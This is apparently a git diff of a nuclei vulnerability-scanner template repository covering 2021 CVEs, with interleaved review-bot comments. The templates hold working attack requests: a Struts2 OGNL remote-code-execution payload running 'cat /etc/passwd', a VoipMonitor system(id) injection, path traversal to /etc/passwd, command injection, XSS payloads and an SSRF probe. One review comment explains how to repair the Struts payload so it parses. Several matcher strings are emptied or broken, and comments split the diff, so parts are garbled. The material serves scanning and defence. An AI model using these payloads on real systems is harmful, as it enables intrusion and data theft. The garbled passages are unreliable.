@@ -1,31 +0,0 @@ -id: CVE-2021-26702 -info: - name: EPrints 3.4.2 XSS - author: ritikchaddha - severity: medium - description: EPrints 3.4.2 exposes a reflected XSS opportunity in the dataset parameter to a cgi/dataset_ dictionary URI. - reference: - - https://github.com/grymer/CVE/blob/master/eprints_security_review.pdf - - https://files.eprints.org/2548/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-26702 - cwe-id: CWE-79 - tags: cve,cve2021,xss,eprints -requests: - - method: GET - path: - - "{{BaseURL}}/cgi/dataset_dictionary?dataset=zulu%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - - type: word - part: header - words: - - "text/html" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-26812.yaml b/nuclei-templates/CVE-2021/CVE-2021-26812.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-26812.yaml rename to nuclei-templates/CVE-2021/CVE-2021-26812.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-27310.yaml b/nuclei-templates/CVE-2021/CVE-2021-27310.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27310.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27310.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-27358.yaml b/nuclei-templates/CVE-2021/CVE-2021-27358.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-27358.yaml rename to nuclei-templates/CVE-2021/CVE-2021-27358.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-27519.yaml b/nuclei-templates/CVE-2021/CVE-2021-27519.yaml deleted file mode 100644 index 97b1350cae..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-27519.yaml +++ /dev/null 
@@ -1,38 +0,0 @@ -id: CVE-2021-27519 -info: - name: FUDForum 3.1.0 - Reflected XSS - author: kh4sh3i - severity: medium - description: | - A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript - reference: - - https://www.exploit-db.com/exploits/49942 - - https://nvd.nist.gov/vuln/detail/CVE-2021-27519 - - https://github.com/fudforum/FUDforum/issues/2 - - http://packetstormsecurity.com/files/162942/FUDForum-3.1.0-Cross-Site-Scripting.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-27519 - cwe-id: CWE-79 - metadata: - shodan-query: 'http.html:"Powered by: FUDforum"' - verified: "true" - tags: cve,cve2021,xss,fudforum -requests: - - method: GET - path: - - '{{BaseURL}}/index.php?SQ=0&srch=x"+onmouseover%3Dalert%281%29+x%3D"&t=search&btn_submit.x=0&btn_submit.y=0' - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'highlightSearchTerms("x" onmouseover=alert(1) x="");' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-27748.yaml b/nuclei-templates/CVE-2021/CVE-2021-27748.yaml new file mode 100644 index 0000000000..23f9aef7c7 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-27748.yaml 
@@ -0,0 +1,33 @@
+id: CVE-2021-27748
+info:
+ name: IBM WebSphere HCL Digital Experience - Server-Side Request Forgery
+ author: pdteam
+ severity: high
+ description: |
+ IBM WebSphere HCL Digital Experience is susceptible to server-side request forgery vulnerability that impacts on-premise deployments and containers.
+ reference:
+ - https://blog.assetnote.io/2021/12/26/chained-ssrf-websphere/
+ - https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0095665
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27748
+ classification:
+ cve-id: CVE-2021-27748
+ metadata:
+ verified: true
+ shodan-query: http.html:"IBM WebSphere Portal"
+ tags: cve,cve2021,hcl,ibm,ssrf,websphere
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/docpicker/internal_proxy/http/interact.sh'
+ - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh'
+ redirects: true
+ max-redirects: 2
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Interactsh Server"
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2021/cve-2021-27850.yaml b/nuclei-templates/CVE-2021/CVE-2021-27850.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-27850.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-27850.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-28164.yaml b/nuclei-templates/CVE-2021/CVE-2021-28164.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-28164.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-28164.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml b/nuclei-templates/CVE-2021/CVE-2021-28377.yaml
deleted file mode 100644
index d55e6fcef0..0000000000
--- a/nuclei-templates/CVE-2021/CVE-2021-28377.yaml
+++ /dev/null
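Review bot: Both `path` entries proxy to the literal public host `interact.sh` and the only evidence is the string `Interactsh Server` in the proxied body, so the verdict depends on that third-party service being up and still returning that banner, and a positive proves only that the target can fetch one well-known internet host — not that an attacker-chosen destination is reachable. nuclei's built-in OAST is the right tool: put `{{interactsh-url}}` in both paths and replace the `matchers-condition`, body-word and status matchers with a match on the `interactsh_protocol` part, which also catches the case where the proxy makes the request but does not return the body.
```yaml
    path:
      - '{{BaseURL}}/docpicker/internal_proxy/http/{{interactsh-url}}'
      - '{{BaseURL}}/wps/PA_WCM_Authoring_UI/proxy/http/{{interactsh-url}}'
    # … unchanged: redirects / max-redirects / stop-at-first-match …
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
```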
@@ -1,27 +0,0 @@ -id: CVE-2021-28377 -info: - name: ChronoForums 2.0.11 - Directory Traversal - author: 0x_Akoko - severity: medium - description: The ChronoForums avatar function is vulnerable through unauthenticated path traversal attacks. This enables unauthenticated attackers to read arbitrary files, for example the Joomla! configuration file which contains credentials. - reference: - - https://herolab.usd.de/en/security-advisories/usd-2021-0007/ - - https://nvd.nist.gov/vuln/detail/CVE-2021-28377 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-28377 - cwe-id: CWE-22 - tags: cve,cve2021,chronoforums,lfi,joomla -requests: - - method: GET - path: - - "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-28918.yaml b/nuclei-templates/CVE-2021/CVE-2021-28918.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-28918.yaml rename to nuclei-templates/CVE-2021/CVE-2021-28918.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-29156.yaml b/nuclei-templates/CVE-2021/CVE-2021-29156.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-29156.yaml rename to nuclei-templates/CVE-2021/CVE-2021-29156.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-29622.yaml b/nuclei-templates/CVE-2021/CVE-2021-29622.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-29622.yaml rename to nuclei-templates/CVE-2021/CVE-2021-29622.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-29625.yaml b/nuclei-templates/CVE-2021/CVE-2021-29625.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-29625.yaml rename to nuclei-templates/CVE-2021/CVE-2021-29625.yaml 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-30461.yaml b/nuclei-templates/CVE-2021/CVE-2021-30461.yaml deleted file mode 100644 index 4f33512058..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-30461.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2021-30461 -info: - name: VoipMonitor Pre-Auth-RCE - author: nithissh - severity: critical - description: A malicious actor can trigger Un authenticated Remote Code Execution using CVE-2021-30461. - tags: cve,cve2021,rce,voipmonitor - reference: https://ssd-disclosure.com/ssd-advisory-voipmonitor-unauth-rce/ -requests: - - raw: - - | - POST /index.php HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Content-Type: application/x-www-form-urlencoded - Content-Length: 35 - - SPOOLDIR=test".system(id)."&recheck=Recheck - matchers-condition: and - matchers: - - type: word - words: - - "uid=" - - "gid=" - - "groups=" - - "VoIPmonitor installation" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-31805.yaml b/nuclei-templates/CVE-2021/CVE-2021-31805.yaml new file mode 100644 index 0000000000..8b70dbaa8d --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-31805.yaml 
@@ -0,0 +1,48 @@
+id: CVE-2021-31805
+info:
+ name: Apache Struts2 S2-062 - Remote Code Execution
+ author: taielab
+ severity: critical
+ description: Apache Struts2 S2-062 is vulnerable to remote code execution. The fix issued for CVE-2020-17530 (S2-061) was incomplete, meaning some of the tag's attributes could still perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax.
+ reference:
+ - https://cwiki.apache.org/confluence/display/WW/S2-062
+ - https://github.com/Axx8/Struts2_S2-062_CVE-2021-31805
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-31805
+ remediation: Avoid using forced OGNL evaluation on untrusted user input, and/or upgrade to Struts 2.5.30 or greater which checks if expression evaluation won't lead to the double evaluation.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-31805
+ cwe-id: CWE-917
+ tags: cve,cve2021,apache,rce,struts,struts2
+requests:
+ - raw:
+ - |
+ POST / HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
+ Content-Length: 1095
+
+ ------WebKitFormBoundaryl7d1B1aGsV2wcZwF
+ Content-Disposition: form-data; name="id"
+
+ %{
+ (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
+ (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +
+ (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
+ (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +
+ (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +
+ (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +
+ (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
+ 
(#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +
+ (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))
+ }
+
+ ------WebKitFormBoundaryl7d1B1aGsV2wcZwF—
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - "root:.*:0:0:"
+
+# Enhanced by mp on 2022/04/21
diff --git a/nuclei-templates/CVE-2021/cve-2021-31856.yaml b/nuclei-templates/CVE-2021/CVE-2021-31856.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-31856.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-31856.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-31862.yaml b/nuclei-templates/CVE-2021/CVE-2021-31862.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-31862.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-31862.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-32853.yaml b/nuclei-templates/CVE-2021/CVE-2021-32853.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-32853.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-32853.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-33044.yaml b/nuclei-templates/CVE-2021/CVE-2021-33044.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-33044.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-33044.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-3378.yaml b/nuclei-templates/CVE-2021/CVE-2021-3378.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-3378.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-3378.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-33807.yaml b/nuclei-templates/CVE-2021/CVE-2021-33807.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-33807.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-33807.yaml
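Review bot: The closing multipart delimiter, `------WebKitFormBoundaryl7d1B1aGsV2wcZwF—`, ends in an em dash (U+2014) rather than the two ASCII hyphens a multipart parser requires, so as shown the `id` part is never terminated and Struts may not evaluate it at all; it should read `------WebKitFormBoundaryl7d1B1aGsV2wcZwF--` (if the dash is a rendering artifact, the file still deserves a look, since that one line decides whether the part is parsed). `Content-Length: 1095` is hard-coded against a multi-line body; as far as I recall nuclei recomputes the length for raw requests unless `unsafe: true` is set, but removing the header takes the doubt away. The payload also executes `cat /etc/passwd` on the target after replacing `excludedPackageNames` and `excludedClasses` on the live value stack's `memberAccess` with empty sets, which the Kaswara RCE template in this same commit marks with `intrusive`; add that tag so scans that exclude intrusive checks skip this one.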
diff --git a/nuclei-templates/CVE-2021/cve-2021-34621.yaml b/nuclei-templates/CVE-2021/CVE-2021-34621.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-34621.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-34621.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-35265.yaml b/nuclei-templates/CVE-2021/CVE-2021-35265.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-35265.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-35265.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-35336.yaml b/nuclei-templates/CVE-2021/CVE-2021-35336.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-35336.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-35336.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml b/nuclei-templates/CVE-2021/CVE-2021-36450.yaml
deleted file mode 100644
index 7220501c25..0000000000
--- a/nuclei-templates/CVE-2021/CVE-2021-36450.yaml
+++ /dev/null
@@ -1,55 +0,0 @@ -id: CVE-2021-36450 -info: - name: Verint 15.2 - Cross Site Scripting - author: atomiczsec - severity: medium - description: Verint Workforce Optimization (WFO) 15.2.8.10048 allows XSS via the control/my_notifications NEWUINAV parameter. - reference: - - https://medium.com/@1nf0sk/cve-2021-36450-cross-site-scripting-xss-6f5d8d7db740 - - https://sushantvkamble.blogspot.com/2021/11/cross-site-scripting-xss.html - - https://nvd.nist.gov/vuln/detail/CVE-2021-36450 - - http://verint.com - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-36450 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Verint Sign-in" - verified: "true" - tags: cve,cve2021,xss,verint -requests: - - raw: - - | - GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1 - Host: {{Hostname}} - - | - POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - browserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}} - redirects: true - max-redirects: 2 - cookie-reuse: true - extractors: - - type: regex - part: header - internal: true - name: csrfp_login - group: 1 - regex: - - 'csrfp_login=([a-zA-Z0-9]+);' - matchers-condition: and - matchers: - - type: word - part: body - words: - - '">

Test

26" class="loginUserNameText'
- - type: word
- part: header
- words:
- - text/html
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2021/cve-2021-37833.yaml b/nuclei-templates/CVE-2021/CVE-2021-37833.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-37833.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-37833.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-39211.yaml b/nuclei-templates/CVE-2021/CVE-2021-39211.yaml
new file mode 100644
index 0000000000..0847c7cf42
--- /dev/null
+++ b/nuclei-templates/CVE-2021/CVE-2021-39211.yaml
@@ -0,0 +1,31 @@
+id: CVE-2021-39211
+info:
+ name: GLPI Telemetry Disclosure
+ author: dogasantos,noraj
+ severity: medium
+ description: GLPI => 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-39211
+ - https://github.com/glpi-project/glpi/security/advisories/GHSA-xx66-v3g5-w825
+ - https://github.com/glpi-project/glpi/releases/tag/9.5.6
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2021-39211
+ cwe-id: CWE-668,CWE-200
+ tags: cve,cve2021,glpi,exposure
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ajax/telemetry.php"
+ - "{{BaseURL}}/glpi/ajax/telemetry.php"
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"uuid":'
+ - '"glpi":'
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2021/cve-2021-39316.yaml b/nuclei-templates/CVE-2021/CVE-2021-39316.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-39316.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-39316.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-39327.yaml b/nuclei-templates/CVE-2021/CVE-2021-39327.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-39327.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-39327.yaml
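Review bot: `description: GLPI => 9.2 and < 9.5.6, ...` writes the lower version bound as `=>` where `>=` is meant; change it to `description: GLPI >= 9.2 and < 9.5.6, the telemetry endpoint discloses GLPI and server information.`. The references already point at the 9.5.6 release that closes the issue, so a `remediation: Upgrade to GLPI 9.5.6 or later.` line under `reference` would make the finding actionable without asserting anything the template does not already cite. The `"uuid":` plus `"glpi":` word match is a reasonable fingerprint for the JSON telemetry body; I cannot tell from here whether the endpoint sets an `application/json` content type that a `part: header` matcher could additionally pin down.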
diff --git a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml deleted file mode 100644 index 22c1d83310..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-40149 -info: - name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure - author: For3stCo1d - severity: high - description: | - Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. - reference: - - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt - - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149 - classification: - cve-id: CVE-2021-40149 - metadata: - shodan-query: http.title:"Reolink" - verified: "true" - tags: cve,cve2021,reolink,camera,iot,exposure,unauth -requests: - - method: GET - path: - - "{{BaseURL}}/self.key" - matchers-condition: and - matchers: - - type: word - words: - - "-----BEGIN RSA PRIVATE KEY-----" - - "-----END RSA PRIVATE KEY----" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-40856.yaml b/nuclei-templates/CVE-2021/CVE-2021-40856.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-40856.yaml rename to nuclei-templates/CVE-2021/CVE-2021-40856.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-40978.yaml b/nuclei-templates/CVE-2021/CVE-2021-40978.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-40978.yaml rename to nuclei-templates/CVE-2021/CVE-2021-40978.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-41174.yaml b/nuclei-templates/CVE-2021/CVE-2021-41174.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41174.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41174.yaml 
diff --git a/nuclei-templates/CVE-2021/cve-2021-41467.yaml b/nuclei-templates/CVE-2021/CVE-2021-41467.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-41467.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-41467.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-41649.yaml b/nuclei-templates/CVE-2021/CVE-2021-41649.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-41649.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-41649.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-42237.yaml b/nuclei-templates/CVE-2021/CVE-2021-42237.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-42237.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-42237.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-42258.yaml b/nuclei-templates/CVE-2021/CVE-2021-42258.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-42258.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-42258.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-43495.yaml b/nuclei-templates/CVE-2021/CVE-2021-43495.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/cve-2021-43495.yaml
rename to nuclei-templates/CVE-2021/CVE-2021-43495.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-44077.yaml b/nuclei-templates/CVE-2021/CVE-2021-44077.yaml
deleted file mode 100644
index 738964414c..0000000000
--- a/nuclei-templates/CVE-2021/CVE-2021-44077.yaml
+++ /dev/null
@@ -1,32 +0,0 @@ -id: CVE-2021-44077 -info: - name: Zoho ManageEngine ServiceDesk Plus - Remote Code Execution - author: Adam Crosser,gy741 - severity: critical - description: Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution. - reference: - - https://www.cisa.gov/uscert/ncas/alerts/aa21-336a - - https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/ - - https://github.com/horizon3ai/CVE-2021-44077 - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb - - https://nvd.nist.gov/vuln/detail/CVE-2021-44077 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-44077 - cwe-id: CWE-287 - tags: cve,cve2021,zoho,manageengine,rce,kev -requests: - - method: GET - path: - - "{{BaseURL}}/RestAPI/ImportTechnicians" - matchers-condition: and - matchers: - - type: word - words: - - '
' + - 'Send Access Request URL' + condition: and + +# Enhanced by md on 2022/09/02 diff --git a/nuclei-templates/CVE-2021/CVE-2021-20158.yaml b/nuclei-templates/CVE-2021/cve-2021-20158.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-20158.yaml rename to nuclei-templates/CVE-2021/cve-2021-20158.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-21307.yaml b/nuclei-templates/CVE-2021/cve-2021-21307.yaml similarity index 100% rename from nuclei-templates/CVE-2021/CVE-2021-21307.yaml rename to nuclei-templates/CVE-2021/cve-2021-21307.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-21799.yaml b/nuclei-templates/CVE-2021/cve-2021-21799.yaml deleted file mode 100644 index 3c93d2ef05..0000000000 --- a/nuclei-templates/CVE-2021/cve-2021-21799.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2021-21799 - -info: - name: Advantech R-SeeNet 2.4.12 - Cross-Site Scripting - author: arafatansari - severity: medium - description: | - Advantech R-SeeNet 2.4.12 contains a reflected cross-site scripting vulnerability in the telnet_form.php script functionality. - reference: - - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1270 - - https://nvd.nist.gov/vuln/detail/CVE-2021-21799 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-21799 - cwe-id: CWE-79 - metadata: - shodan-query: http.html:"R-SeeNet" - verified: "true" - tags: cve,cve2021,xss,r-seenet - -requests: - - method: GET - path: - - "{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Telnet " - - - type: word - part: header - words: - - "text/html" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/09/02 
diff --git a/nuclei-templates/CVE-2021/CVE-2021-21803.yaml b/nuclei-templates/CVE-2021/cve-2021-21803.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-21803.yaml
rename to nuclei-templates/CVE-2021/cve-2021-21803.yaml
diff --git a/nuclei-templates/CVE-2021/cve-2021-21805.yaml b/nuclei-templates/CVE-2021/cve-2021-21805.yaml
new file mode 100644
index 0000000000..7c6b7bea06
--- /dev/null
+++ b/nuclei-templates/CVE-2021/cve-2021-21805.yaml
@@ -0,0 +1,46 @@
+id: CVE-2021-21805
+
+info:
+ name: Advantech R-SeeNet 2.4.12 - OS Command Injection
+ author: arafatansari
+ severity: critical
+ description: |
+ Advantech R-SeeNet 2.4.12 is susceptible to remote OS command execution via the ping.php script functionality. An attacker, via a specially crafted HTTP request, can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
+ reference:
+ - https://talosintelligence.com/vulnerability_reports/TALOS-2021-1274
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21805
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-21805
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-21805
+ cwe-id: CWE-78
+ metadata:
+ shodan-query: http.html:"R-SeeNet"
+ verified: "true"
+ tags: cve,cve2021,rce,r-seenet
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/php/ping.php?hostname=|dir"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Ping |dir"
+ - "bottom.php"
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by md on 2022/10/06
diff --git a/nuclei-templates/CVE-2021/CVE-2021-21985.yaml b/nuclei-templates/CVE-2021/cve-2021-21985.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-21985.yaml
rename to nuclei-templates/CVE-2021/cve-2021-21985.yaml
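Review bot: The body matcher `"Ping |dir"` in the cve-2021-21805 hunk only confirms that the submitted hostname value is echoed back in the page; as far as the hunk shows, nothing in the match proves the command was executed, so a build that reflects the parameter without executing it could match as well and the result should be documented as an indicator that needs confirmation rather than as proof. A comment above the matcher such as `# reflection of the injected value plus the bottom.php footer; does not confirm execution` would make that explicit to operators. Because the request deliberately attempts command execution on the target, the `intrusive` tag used elsewhere in this repository (see the tags of the removed cve-2021-24284 template) also seems warranted so the template can be excluded from non-intrusive runs.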
diff --git a/nuclei-templates/CVE-2021/CVE-2021-22053.yaml b/nuclei-templates/CVE-2021/cve-2021-22053.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-22053.yaml
rename to nuclei-templates/CVE-2021/cve-2021-22053.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-22986.yaml b/nuclei-templates/CVE-2021/cve-2021-22986.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-22986.yaml
rename to nuclei-templates/CVE-2021/cve-2021-22986.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-23241.yaml b/nuclei-templates/CVE-2021/cve-2021-23241.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-23241.yaml
rename to nuclei-templates/CVE-2021/cve-2021-23241.yaml
diff --git a/nuclei-templates/CVE-2021/CVE-2021-24235.yaml b/nuclei-templates/CVE-2021/cve-2021-24235.yaml
similarity index 100%
rename from nuclei-templates/CVE-2021/CVE-2021-24235.yaml
rename to nuclei-templates/CVE-2021/cve-2021-24235.yaml
